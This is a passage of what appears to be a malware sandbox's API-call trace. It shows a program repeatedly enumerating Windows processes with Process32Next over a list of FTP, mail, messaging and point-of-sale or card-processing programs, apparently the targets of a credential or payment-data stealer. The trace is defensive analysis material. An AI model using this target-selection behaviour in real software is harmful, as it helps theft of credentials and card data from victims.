(in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0200.216] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0200.217] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0200.219] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0200.221] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0200.222] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0200.224] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0200.226] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0200.228] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0200.233] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0200.235] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0200.237] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0200.239] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0200.241] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0200.243] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0200.245] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0200.251] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0200.253] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0200.254] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0200.256] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0200.258] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0200.260] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0200.348] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0200.350] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0200.352] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0200.353] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0200.358] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0200.361] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0200.363] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0200.365] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0200.367] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0200.369] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0200.373] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0200.375] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0200.377] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0200.378] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0200.381] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0200.383] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0200.391] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0200.393] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0200.395] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0200.397] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0200.399] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0200.405] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0200.407] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0200.409] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0200.411] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0200.413] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.416] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.421] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0200.423] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0200.425] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0200.427] CloseHandle (hObject=0x21f8) returned 1 [0200.427] Sleep (dwMilliseconds=0x64) [0200.566] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0200.584] Process32First (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.586] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.588] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.593] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.596] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.599] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.601] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.603] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.607] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.609] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.611] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.612] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.614] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.616] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.618] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.631] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.633] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.640] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.643] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.645] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.647] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0200.649] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0200.652] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.657] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.659] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0200.661] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0200.663] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0200.666] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0200.671] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.674] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0200.676] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0200.678] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 